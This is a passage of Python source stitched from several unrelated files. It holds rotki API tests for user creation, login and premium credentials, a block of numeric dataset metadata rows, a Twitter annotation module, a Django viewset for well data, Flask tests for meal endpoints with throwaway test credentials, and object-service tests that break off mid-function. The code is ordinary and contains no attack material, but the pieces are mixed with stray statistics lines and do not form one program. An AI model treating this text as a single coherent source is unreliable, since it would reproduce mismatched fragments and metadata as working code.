# But then try to create a normal-non premium user and see it works
username = 'hania2'
data = {
'name': username,
'password': '1234',
}
response = requests.put(api_url_for(rotkehlchen_api_server, "usersresource"), json=data)
assert_proper_response(response)
check_proper_unlock_result(response.json())
# Query users and make sure the new user is logged in
response = requests.get(api_url_for(rotkehlchen_api_server, "usersresource"))
assert_proper_response(response)
json = response.json()
assert json['result'][username] == 'loggedin'
assert len(json['result']) == 2
# Check that the directory was created
assert Path(data_dir / username / 'rotkehlchen.db').exists()
@pytest.mark.parametrize('start_with_logged_in_user', [False])
def test_user_creation_errors(rotkehlchen_api_server, data_dir):
"""Test errors and edge cases for user creation"""
# Missing username
username = 'hania'
data = {
'password': '1234',
}
response = requests.put(api_url_for(rotkehlchen_api_server, "usersresource"), json=data)
assert_error_response(
response=response,
contained_in_msg='Missing data for required field',
)
# Missing password
username = 'hania'
data = {
'name': username,
}
response = requests.put(api_url_for(rotkehlchen_api_server, "usersresource"), json=data)
assert_error_response(
response=response,
contained_in_msg='Missing data for required field',
)
# Invalid type for name
data = {
'name': 5435345.31,
'password': '1234',
}
response = requests.put(api_url_for(rotkehlchen_api_server, "usersresource"), json=data)
assert_error_response(
response=response,
contained_in_msg='Not a valid string',
)
# Invalid type for password
data = {
'name': username,
'password': 4535,
}
response = requests.put(api_url_for(rotkehlchen_api_server, "usersresource"), json=data)
assert_error_response(
response=response,
contained_in_msg='Not a valid string',
)
# Provide only premium_api_key
data = {
'name': username,
'password': '1234',
'premium_api_key': 'asdsada',
}
response = requests.put(api_url_for(rotkehlchen_api_server, "usersresource"), json=data)
assert_error_response(
response=response,
contained_in_msg='Must provide both or neither of api key/secret',
)
# Provide only premium_api_secret
data = {
'name': username,
'password': '1234',
'premium_api_secret': 'asdsada',
}
response = requests.put(api_url_for(rotkehlchen_api_server, "usersresource"), json=data)
assert_error_response(
response=response,
contained_in_msg='Must provide both or neither of api key/secret',
)
# Invalid type for premium api key
data = {
'name': username,
'password': '1234',
'premium_api_key': True,
}
response = requests.put(api_url_for(rotkehlchen_api_server, "usersresource"), json=data)
assert_error_response(
response=response,
contained_in_msg='Not a valid string',
)
# Invalid type for premium api secret
data = {
'name': username,
'password': '1234',
'premium_api_secret': 45.2,
}
response = requests.put(api_url_for(rotkehlchen_api_server, "usersresource"), json=data)
assert_error_response(
response=response,
contained_in_msg='Not a valid string',
)
# Check that the directory was NOT created
assert not Path(data_dir / username / 'rotkehlchen.db').exists()
# Let's pretend there is another user, and try to create them again
Path(data_dir / 'another_user').mkdir()
Path(data_dir / 'another_user' / 'rotkehlchen.db').touch()
data = {
'name': 'another_user',
'password': '1234',
}
response = requests.put(api_url_for(rotkehlchen_api_server, "usersresource"), json=data)
assert_error_response(
response=response,
contained_in_msg='User another_user already exists',
status_code=HTTPStatus.CONFLICT,
)
def test_user_creation_with_already_loggedin_user(rotkehlchen_api_server, username):
"""Test that creating a user while another one is logged in fails"""
# Missing username
data = {
'name': username,
'password': '1234',
}
response = requests.put(api_url_for(rotkehlchen_api_server, "usersresource"), json=data)
msg = (
f'Can not create a new user because user {username} is already logged in. '
f'Log out of that user first'
)
assert_error_response(
response=response,
contained_in_msg=msg,
status_code=HTTPStatus.CONFLICT,
)
def test_user_logout(rotkehlchen_api_server, username):
"""Test that user logout works succesfully and that common errors are handled"""
rotki = rotkehlchen_api_server.rest_api.rotkehlchen
# Logout of a non-existing/different user
data = {'action': 'logout'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name='nobody'),
json=data,
)
assert_error_response(
response=response,
contained_in_msg='Provided user nobody is not the logged in user',
status_code=HTTPStatus.CONFLICT,
)
assert rotki.user_is_logged_in is True
# Logout of the active user
data = {'action': 'logout'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_simple_ok_response(response)
assert rotki.user_is_logged_in is False
# Now try to log out of the same user again
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_error_response(
response=response,
contained_in_msg='No user is currently logged in',
status_code=HTTPStatus.CONFLICT,
)
assert rotki.user_is_logged_in is False
def test_user_login(rotkehlchen_api_server, username, db_password, data_dir):
"""Test that user login works properly"""
rotki = rotkehlchen_api_server.rest_api.rotkehlchen
# Let's pretend there is another user, and try to create them again
Path(data_dir / 'another_user').mkdir()
Path(data_dir / 'another_user' / 'rotkehlchen.db').touch()
# Check users status
users_data = check_user_status(rotkehlchen_api_server)
assert len(users_data) == 2
assert users_data[username] == 'loggedin'
assert users_data['another_user'] == 'loggedout'
# Logout of the active user
data = {'action': 'logout'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_simple_ok_response(response)
assert rotki.user_is_logged_in is False
users_data = check_user_status(rotkehlchen_api_server)
assert len(users_data) == 2
assert users_data[username] == 'loggedout'
assert users_data['another_user'] == 'loggedout'
# Now let's try to login
data = {'action': 'login', "password": db_password, 'sync_approval': 'unknown'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
# And make sure it works
assert_proper_response(response)
check_proper_unlock_result(response.json())
assert rotki.user_is_logged_in is True
users_data = check_user_status(rotkehlchen_api_server)
assert len(users_data) == 2
assert users_data[username] == 'loggedin'
assert users_data['another_user'] == 'loggedout'
# Logout again
data = {'action': 'logout'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_simple_ok_response(response)
assert rotki.user_is_logged_in is False
users_data = check_user_status(rotkehlchen_api_server)
assert len(users_data) == 2
assert users_data[username] == 'loggedout'
assert users_data['another_user'] == 'loggedout'
# Now try to login with a wrong password
data = {'action': 'login', "password": 'wrong_password', 'sync_approval': 'unknown'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
# And make sure it fails
assert_error_response(
response=response,
contained_in_msg='Wrong password or invalid/corrupt database for user',
status_code=HTTPStatus.UNAUTHORIZED,
)
users_data = check_user_status(rotkehlchen_api_server)
assert len(users_data) == 2
assert users_data[username] == 'loggedout'
assert users_data['another_user'] == 'loggedout'
# Now let's manually add valid but not authenticable premium credentials in the DB
data = {'action': 'login', "password": db_password, 'sync_approval': 'unknown'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
credentials = PremiumCredentials(VALID_PREMIUM_KEY, VALID_PREMIUM_SECRET)
rotki.data.db.set_rotkehlchen_premium(credentials)
data = {'action': 'logout'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_simple_ok_response(response)
assert rotki.user_is_logged_in is False
# And try to login while having these unauthenticable premium credentials in the DB
data = {'action': 'login', "password": db_password, 'sync_approval': 'unknown'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
# And make sure it works despite having unauthenticable premium credentials in the DB
assert_proper_response(response)
check_proper_unlock_result(response.json())
assert rotki.user_is_logged_in is True
users_data = check_user_status(rotkehlchen_api_server)
assert len(users_data) == 2
assert users_data[username] == 'loggedin'
assert users_data['another_user'] == 'loggedout'
def test_user_set_premium_credentials(rotkehlchen_api_server, username):
"""Test that setting the premium credentials endpoint works.
We mock the server accepting the premium credentials
"""
rotki = rotkehlchen_api_server.rest_api.rotkehlchen
_, patched_premium_at_set, patched_get = create_patched_premium(
PremiumCredentials(VALID_PREMIUM_KEY, VALID_PREMIUM_SECRET),
patch_get=True,
metadata_last_modify_ts=0,
metadata_data_hash=b'',
metadata_data_size=0,
)
# Set premium credentials for current user
data = {'premium_api_key': VALID_PREMIUM_KEY, 'premium_api_secret': VALID_PREMIUM_SECRET}
with patched_premium_at_set:
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_simple_ok_response(response)
assert rotki.premium is not None
assert rotki.premium.credentials.serialize_key() == VALID_PREMIUM_KEY
assert rotki.premium.credentials.serialize_secret() == VALID_PREMIUM_SECRET
with patched_get:
assert rotki.premium.is_active()
def test_user_set_premium_credentials_errors(rotkehlchen_api_server, username):
"""Test that setting the premium credentials endpoint reacts properly to bad input"""
# Set premium credentials for non-logged in user
data = {'premium_api_key': 'dadssad', 'premium_api_secret': 'jhjhkh'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name='another_user'),
json=data,
)
assert_error_response(
response=response,
contained_in_msg='Provided user another_user is not the logged in user',
status_code=HTTPStatus.CONFLICT,
)
# Set valid format but not authenticated premium credentials for logged in user
data = {'premium_api_key': VALID_PREMIUM_KEY, 'premium_api_secret': VALID_PREMIUM_SECRET}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_error_response(
response=response,
contained_in_msg='Rotkehlchen API key was rejected by server',
status_code=HTTPStatus.UNAUTHORIZED,
)
def test_users_by_name_endpoint_errors(rotkehlchen_api_server, username, db_password):
"""Test that user by name endpoint errors are handled (for login/logout and edit)"""
rotki = rotkehlchen_api_server.rest_api.rotkehlchen
# Now let's try to login while the user is already logged in
data = {'action': 'login', 'password': db_password, 'sync_approval': 'unknown'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
expected_msg = (
f'Can not login to user {username} because user {username} is '
f'already logged in. Log out of that user first'
)
assert_error_response(
response=response,
contained_in_msg=expected_msg,
status_code=HTTPStatus.CONFLICT,
)
assert rotki.user_is_logged_in is True
# Logout of the active user
data = {'action': 'logout'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_simple_ok_response(response)
assert rotki.user_is_logged_in is False
# Now let's try to login with an invalid password
data = {'action': 'login', 'password': 'wrong-password', 'sync_approval': 'unknown'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_error_response(
response=response,
contained_in_msg='Wrong password or invalid/corrupt database for user',
status_code=HTTPStatus.UNAUTHORIZED,
)
assert rotki.user_is_logged_in is False
# Login action without a password
data = {'action': 'login', 'sync_approval': 'unknown'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_error_response(
response=response,
contained_in_msg='Missing password field for login',
status_code=HTTPStatus.BAD_REQUEST,
)
assert rotki.user_is_logged_in is False
# No action and no premium credentials
data = {'sync_approval': 'unknown'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_error_response(
response=response,
contained_in_msg='Without an action premium api key and secret must be provided',
status_code=HTTPStatus.BAD_REQUEST,
)
assert rotki.user_is_logged_in is False
# No action and only premium key
data = {'sync_approval': 'unknown', 'premium_api_key': VALID_PREMIUM_KEY}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_error_response(
response=response,
contained_in_msg='Without an action premium api key and secret must be provided',
status_code=HTTPStatus.BAD_REQUEST,
)
assert rotki.user_is_logged_in is False
# No action and only premium secret
data = {'sync_approval': 'unknown', 'premium_api_secret': VALID_PREMIUM_SECRET}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_error_response(
response=response,
contained_in_msg='Without an action premium api key and secret must be provided',
status_code=HTTPStatus.BAD_REQUEST,
)
assert rotki.user_is_logged_in is False
# Invalid action type
data = {'action': 555.3, 'password': db_password, 'sync_approval': 'unknown'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_error_response(
response=response,
contained_in_msg='Not a valid string',
status_code=HTTPStatus.BAD_REQUEST,
)
assert rotki.user_is_logged_in is False
# Invalid action string
data = {'action': 'chopwood', 'password': db_password, 'sync_approval': 'unknown'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_error_response(
response=response,
contained_in_msg='Must be one of: login, logout',
status_code=HTTPStatus.BAD_REQUEST,
)
assert rotki.user_is_logged_in is False
# Invalid password type
data = {'action': 'login', 'password': True, 'sync_approval': 'unknown'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_error_response(
response=response,
contained_in_msg='Not a valid string',
status_code=HTTPStatus.BAD_REQUEST,
)
assert rotki.user_is_logged_in is False
| 36.736132
| 96
| 0.697302
| 3,015
| 24,503
| 5.402653
| 0.078939
| 0.067776
| 0.081036
| 0.052796
| 0.829149
| 0.822887
| 0.791945
| 0.765179
| 0.762907
| 0.756216
| 0
| 0.004631
| 0.206913
| 24,503
| 666
| 97
| 36.791291
| 0.833582
| 0.120557
| 0
| 0.683206
| 0
| 0
| 0.1822
| 0.005837
| 0
| 0
| 0
| 0
| 0.221374
| 1
| 0.026718
| false
| 0.053435
| 0.017176
| 0
| 0.045802
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
0a2147077a2f522f60c526f2f818598d8132fcc1
| 454
|
py
|
Python
|
twitter_api_v2/ContextAnnotation.py
|
OldBigBuddha/twitter-api-v2-py
|
e64185e85725a7ca41a5b8cf6b4bff114e17a98f
|
[
"MIT"
] | 1
|
2020-11-05T14:29:37.000Z
|
2020-11-05T14:29:37.000Z
|
twitter_api_v2/ContextAnnotation.py
|
OldBigBuddha/twitter-api-v2-py
|
e64185e85725a7ca41a5b8cf6b4bff114e17a98f
|
[
"MIT"
] | null | null | null |
twitter_api_v2/ContextAnnotation.py
|
OldBigBuddha/twitter-api-v2-py
|
e64185e85725a7ca41a5b8cf6b4bff114e17a98f
|
[
"MIT"
] | null | null | null |
from typing import Optional
class Domain:
def __init__(self, id: str, name: str, description: Optional[str] = None) -> None:
self.id: str = id
self.name: str = name
self.description: Optional[str] = description
class Entity:
def __init__(self, id: str, name: str, description: Optional[str] = None) -> None:
self.id: str = id
self.name: str = name
self.description: Optional[str] = description
| 28.375
| 86
| 0.629956
| 58
| 454
| 4.793103
| 0.258621
| 0.086331
| 0.129496
| 0.093525
| 0.834532
| 0.834532
| 0.834532
| 0.834532
| 0.834532
| 0.834532
| 0
| 0
| 0.255507
| 454
| 15
| 87
| 30.266667
| 0.822485
| 0
| 0
| 0.727273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.181818
| false
| 0
| 0.090909
| 0
| 0.454545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0a4f563e5adf9ffb9863baea89804f9a1a7b326d
| 2,598
|
py
|
Python
|
server/api/views/well_views.py
|
dmitrytk/horizon
|
8fc130d9d619de0e7ad7aad24d1e6f457bc68df0
|
[
"MIT"
] | null | null | null |
server/api/views/well_views.py
|
dmitrytk/horizon
|
8fc130d9d619de0e7ad7aad24d1e6f457bc68df0
|
[
"MIT"
] | null | null | null |
server/api/views/well_views.py
|
dmitrytk/horizon
|
8fc130d9d619de0e7ad7aad24d1e6f457bc68df0
|
[
"MIT"
] | null | null | null |
from rest_framework import viewsets
from rest_framework.decorators import action
from api.models import Well
from api.serializers import WellSerializer
from api.services import well_service
class WellViewSet(viewsets.ModelViewSet):
queryset = Well.objects.all()
serializer_class = WellSerializer
# Child objects
@action(detail=True, methods=['get', 'delete'])
def inclinometry(self, request, *args, **kwargs):
if request.method == 'GET':
return well_service.get_well_inclinometry(self.get_object().id)
elif request.method == 'DELETE':
return well_service.delete_well_inclinometry(self.get_object().id)
@action(detail=True, methods=['get', 'delete'])
def mer(self, request, *args, **kwargs):
if request.method == 'GET':
return well_service.get_well_mer(self.get_object().id)
elif request.method == 'DELETE':
return well_service.delete_well_mer(self.get_object().id)
@action(detail=True, methods=['get', 'delete'])
def rates(self, request, *args, **kwargs):
if request.method == 'GET':
return well_service.get_well_rates(self.get_object().id)
elif request.method == 'DELETE':
return well_service.delete_well_rates(self.get_object().id)
@action(detail=True, methods=['get', 'delete'])
def horizons(self, request, *args, **kwargs):
if request.method == 'GET':
return well_service.get_well_horizons(self.get_object().id)
elif request.method == 'DELETE':
return well_service.delete_well_horizons(self.get_object().id)
@action(detail=True, methods=['get', 'delete'])
def cases(self, request, *args, **kwargs):
if request.method == 'GET':
return well_service.get_well_cases(self.get_object().id)
elif request.method == 'DELETE':
return well_service.delete_well_cases(self.get_object().id)
@action(detail=True, methods=['get', 'delete'])
def perforations(self, request, *args, **kwargs):
if request.method == 'GET':
return well_service.get_well_perforations(self.get_object().id)
elif request.method == 'DELETE':
return well_service.delete_well_perforations(self.get_object().id)
@action(detail=True, methods=['get', 'delete'])
def pumps(self, request, *args, **kwargs):
if request.method == 'GET':
return well_service.get_well_pumps(self.get_object().id)
elif request.method == 'DELETE':
return well_service.delete_well_pumps(self.get_object().id)
| 41.903226
| 78
| 0.661278
| 320
| 2,598
| 5.18125
| 0.140625
| 0.099517
| 0.143546
| 0.126659
| 0.811821
| 0.811821
| 0.742461
| 0.721351
| 0.721351
| 0.721351
| 0
| 0
| 0.203618
| 2,598
| 61
| 79
| 42.590164
| 0.801353
| 0.005004
| 0
| 0.42
| 0
| 0
| 0.04878
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.14
| false
| 0
| 0.1
| 0
| 0.58
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
6a5833c0f7788c3f94dbea9c2e43ac9f2af892a0
| 105
|
py
|
Python
|
django_test/django_test/views.py
|
edx/pyinstrument
|
22ff290b98d24a407fbbe5d9d267536ef0a1c9d6
|
[
"BSD-3-Clause"
] | null | null | null |
django_test/django_test/views.py
|
edx/pyinstrument
|
22ff290b98d24a407fbbe5d9d267536ef0a1c9d6
|
[
"BSD-3-Clause"
] | 1
|
2021-01-27T19:26:38.000Z
|
2021-01-27T19:43:50.000Z
|
django_test/django_test/views.py
|
edx/pyinstrument
|
22ff290b98d24a407fbbe5d9d267536ef0a1c9d6
|
[
"BSD-3-Clause"
] | 1
|
2015-01-26T14:47:13.000Z
|
2015-01-26T14:47:13.000Z
|
from django.http import HttpResponse
def hello_world(request):
return HttpResponse('Hello, world!')
| 21
| 40
| 0.771429
| 13
| 105
| 6.153846
| 0.769231
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.133333
| 105
| 4
| 41
| 26.25
| 0.879121
| 0
| 0
| 0
| 0
| 0
| 0.12381
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
6ae0ef220f3d82cdb7388567fe046cf44a422f1a
| 122
|
py
|
Python
|
test2.py
|
maxc-learn/test-repo
|
d2b40f8bb2e5d3befef1d376252c2521374d8055
|
[
"MIT"
] | null | null | null |
test2.py
|
maxc-learn/test-repo
|
d2b40f8bb2e5d3befef1d376252c2521374d8055
|
[
"MIT"
] | 2
|
2018-11-01T21:34:07.000Z
|
2018-11-01T21:34:12.000Z
|
test2.py
|
maxc-learn/test-repo
|
d2b40f8bb2e5d3befef1d376252c2521374d8055
|
[
"MIT"
] | null | null | null |
""" Test file 2 """
def main():
return "Whoooaaaaa test file 2! This is cool"
if __name__ == "__main__":
main()
| 15.25
| 49
| 0.598361
| 17
| 122
| 3.823529
| 0.705882
| 0.246154
| 0.276923
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021739
| 0.245902
| 122
| 7
| 50
| 17.428571
| 0.684783
| 0.090164
| 0
| 0
| 0
| 0
| 0.427184
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0
| 0.25
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
0ab697331d323b15eb4d4492873bcb21e5ccfe03
| 7,545
|
py
|
Python
|
tests/test_meals.py
|
omarion3698/Book-A-Meal
|
330a2331ee13b52772d20eedbc00fc4364585709
|
[
"MIT"
] | null | null | null |
tests/test_meals.py
|
omarion3698/Book-A-Meal
|
330a2331ee13b52772d20eedbc00fc4364585709
|
[
"MIT"
] | null | null | null |
tests/test_meals.py
|
omarion3698/Book-A-Meal
|
330a2331ee13b52772d20eedbc00fc4364585709
|
[
"MIT"
] | null | null | null |
import os
import unittest
from flask import json
from app import create_app, db
from app.custom_http_respones.responses import Success, Error
from app.models.models import User
class TestAuth(unittest.TestCase):
"""Test the meal routes and db"""
def setUp(self):
"""Setting up the variables for testing"""
self.app = create_app(config_name='testing')
self.app.testing = True
self.client = self.app.test_client
self.error = Error()
self.success = Success()
os.environ["SECRET"] = "989d554b-1598-4b77-bf22-0941953cd955"
with self.app.app_context():
# create all tables in the database
db.session.close()
db.drop_all()
db.create_all()
admin = User(email='admin@gmail.com', password='12345678', admin=True)
admin.save()
def test_add_meal_success(self):
"""Admin needs an admin token to add meal"""
res = self.client().post('/auth/login/', data=json.dumps({"email": "admin@gmail.com", "password": "12345678"}))
json_data = json.loads(res.data)
token = json_data['token']
res1 = self.client().post('/meals/', headers=dict(Authorization="Bearer " + token),
data=json.dumps({"name": "rice", "price": 300}))
self.assertEqual(res1.status_code, self.success.ok_status)
def test_add_meal_without_data(self):
"""Test if admin can add meal with not data"""
res = self.client().post('/auth/login/', data=json.dumps({"email": "admin@gmail.com", "password": "12345678"}))
json_data = json.loads(res.data)
token = json_data['token']
res1 = self.client().post('/meals/', headers=dict(Authorization="Bearer " + token),
data=json.dumps({}))
self.assertEqual(res1.status_code, self.error.bad_request_status)
def test_edit_meal_success(self):
res = self.client().post('/auth/login/', data=json.dumps({"email": "admin@gmail.com", "password": "12345678"}))
json_data = json.loads(res.data)
token = json_data['token']
rv = self.client().post('/meals/', headers=dict(Authorization="Bearer " + token),
data=json.dumps({"name": "tender goat", "price": 300}))
rv_json = json.loads(rv.data)
meal_id = rv_json['id']
res = self.client().put('/meals/{}/'.format(meal_id), headers=dict(Authorization="Bearer " + token),
data=json.dumps({"name": "fish", "price": 300}))
self.assertEqual(res.status_code, self.success.ok_status)
def test_edit_meal_with_same_name(self):
res = self.client().post('/auth/login/', data=json.dumps({"email": "admin@gmail.com", "password": "12345678"}))
json_data = json.loads(res.data)
token = json_data['token']
rv = self.client().post('/meals/', headers=dict(Authorization="Bearer " + token),
data=json.dumps({"name": "tender goat", "price": 300}))
rv_json = json.loads(rv.data)
meal_id = rv_json['id']
res = self.client().put('/meals/{}/'.format(meal_id), headers=dict(Authorization="Bearer " + token),
data=json.dumps({"name": "tender goat", "price": 300}))
self.assertEqual(res.status_code, self.error.conflict_status)
def test_edit_meal_with_no_data(self):
res = self.client().post('/auth/login/', data=json.dumps({"email": "admin@gmail.com", "password": "12345678"}))
json_data = json.loads(res.data)
token = json_data['token']
rv = self.client().post('/meals/', headers=dict(Authorization="Bearer " + token),
data=json.dumps({"name": "mushroom", "price": 300}))
rv_json = json.loads(rv.data)
meal_id = rv_json['id']
res = self.client().put('/meals/{}/'.format(meal_id), headers=dict(Authorization="Bearer " + token))
self.assertEqual(res.status_code, self.error.bad_request_status)
def test_edit_non_existing_meal(self):
res = self.client().post('/auth/login/', data=json.dumps({"email": "admin@gmail.com", "password": "12345678"}))
json_data = json.loads(res.data)
token = json_data['token']
res = self.client().put('/meals/-857/', headers=dict(Authorization="Bearer " + token))
self.assertEqual(res.status_code, self.error.not_found_status)
def test_delete_meal_success(self):
res = self.client().post('/auth/login/', data=json.dumps({"email": "admin@gmail.com", "password": "12345678"}))
json_data = json.loads(res.data)
token = json_data['token']
rv = self.client().post('/meals/', headers=dict(Authorization="Bearer " + token),
data=json.dumps({"name": "Cake", "price": 300}))
rv_json = json.loads(rv.data)
meal_id = rv_json['id']
res = self.client().delete('/meals/{}/'.format(meal_id), headers=dict(Authorization="Bearer " + token))
self.assertEqual(res.status_code, self.success.ok_status)
def test_delete_non_existing_meal(self):
res = self.client().post('/auth/login/', data=json.dumps({"email": "admin@gmail.com", "password": "12345678"}))
json_data = json.loads(res.data)
token = json_data['token']
res = self.client().delete('/meals/-485/', headers=dict(Authorization="Bearer " + token))
self.assertEqual(res.status_code, self.error.not_found_status)
def test_admin_login(self):
res = self.client().post('/auth/login/', data=json.dumps({"email": "admin@gmail.com", "password": '12345678'}))
self.assertEqual(res.status_code, self.success.ok_status)
def test_add_meal_without_token(self):
"""Test if only logged user can add meal"""
res = self.client().post('/meals/', data=json.dumps({"name": "rice", "price": 300}))
self.assertEqual(res.status_code, self.error.unauthorized_status)
def test_add_meal_with_invalid_token(self):
"""Test if only admin with valid token can add meal"""
res = self.client().post('/meals/', headers=dict(Authorization="Bearer access_token"),
data=json.dumps({"name": "rice", "price": 300}))
self.assertEqual(res.status_code, self.error.forbidden_status)
def test_get_meals_without_token(self):
"""Test if only logged user can get meals"""
res = self.client().get('/meals/')
self.assertEqual(res.status_code, self.error.unauthorized_status)
def test_get_meals_with_invalid_token(self):
"""Test if only admin with valid token can get meals"""
res = self.client().get('/meals/', headers=dict(Authorization="Bearer access_token"))
self.assertEqual(res.status_code, self.error.forbidden_status)
def test_edit_meal_without_token(self):
"""Test if only logged user can add meal"""
res = self.client().put('/meals/2/', data=json.dumps({"name": "rice", "price": 300}))
self.assertEqual(res.status_code, self.error.unauthorized_status)
def test_edit_meal_with_invalid_token(self):
"""Test if only admin with valid token can edit meal"""
res = self.client().put('/meals/2/', headers=dict(Authorization="Bearer access_token"),
data=json.dumps({"name": "rice", "price": 300}))
self.assertEqual(res.status_code, self.error.forbidden_status)
if __name__ == "__main__":
unittest.main()
| 52.034483
| 119
| 0.619616
| 957
| 7,545
| 4.732497
| 0.125392
| 0.051225
| 0.060278
| 0.09936
| 0.84809
| 0.837492
| 0.814308
| 0.798631
| 0.774564
| 0.757783
| 0
| 0.025385
| 0.216832
| 7,545
| 145
| 120
| 52.034483
| 0.741073
| 0.058714
| 0
| 0.504425
| 0
| 0
| 0.144782
| 0.005105
| 0
| 0
| 0
| 0
| 0.132743
| 1
| 0.141593
| false
| 0.088496
| 0.053097
| 0
| 0.20354
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
0ad91c05c47e35ce0da4afa6568a02b4dfd65497
| 16,028
|
py
|
Python
|
object_service/tests/test_endpoints.py
|
marblestation/object_service
|
73d81fba246a10d4e95266f5269ad14e81f8cea6
|
[
"MIT"
] | null | null | null |
object_service/tests/test_endpoints.py
|
marblestation/object_service
|
73d81fba246a10d4e95266f5269ad14e81f8cea6
|
[
"MIT"
] | null | null | null |
object_service/tests/test_endpoints.py
|
marblestation/object_service
|
73d81fba246a10d4e95266f5269ad14e81f8cea6
|
[
"MIT"
] | null | null | null |
import sys
import os
from flask_testing import TestCase
from flask import request
from flask import url_for, Flask
import unittest
import requests
import time
from object_service import app
import json
import httpretty
import mock
from requests.exceptions import ConnectTimeout, ReadTimeout
class TestExpectedResults(TestCase):
'''Check if the service returns expected results'''
def create_app(self):
'''Create the wsgi application'''
app_ = app.create_app()
return app_
@httpretty.activate
def test_object_search_200(self):
'''Test to see if calling the object search endpoint
works for valid data'''
QUERY_URL = self.app.config.get('OBJECTS_SIMBAD_TAP_URL')
mockdata = {"data":[[1575544, "NAME ANDROMEDA","NAME ANDROMEDA"],[3133169, "NAME LMC", "NAME LMC"]]}
# We will be doing a POST request with a set of identifiers
identifiers = ["3133169", "1575544"]
# Mock the reponse
httpretty.register_uri(
httpretty.POST, QUERY_URL,
content_type='application/json',
status=200,
body='%s'%json.dumps(mockdata))
# Do the POST request
r = self.client.post(
url_for('objectsearch'),
content_type='application/json',
data=json.dumps({'identifiers': identifiers}))
# The response should have a status code 200
self.assertTrue(r.status_code == 200)
# See if we received the expected results
expected = {u'3133169': {u'id': '3133169', u'canonical': u'LMC'}, u'1575544': {u'id': '1575544', u'canonical': u'ANDROMEDA'}}
self.assertEqual(r.json, expected)
@httpretty.activate
def test_object_search_500(self):
'''Test to see if a 500 from SIMBAD is processed correctly'''
QUERY_URL = self.app.config.get('OBJECTS_SIMBAD_TAP_URL')
identifiers = ["3133169", "1575544"]
# Mock the reponse
httpretty.register_uri(
httpretty.POST, QUERY_URL,
content_type='application/json',
status=500,
body='')
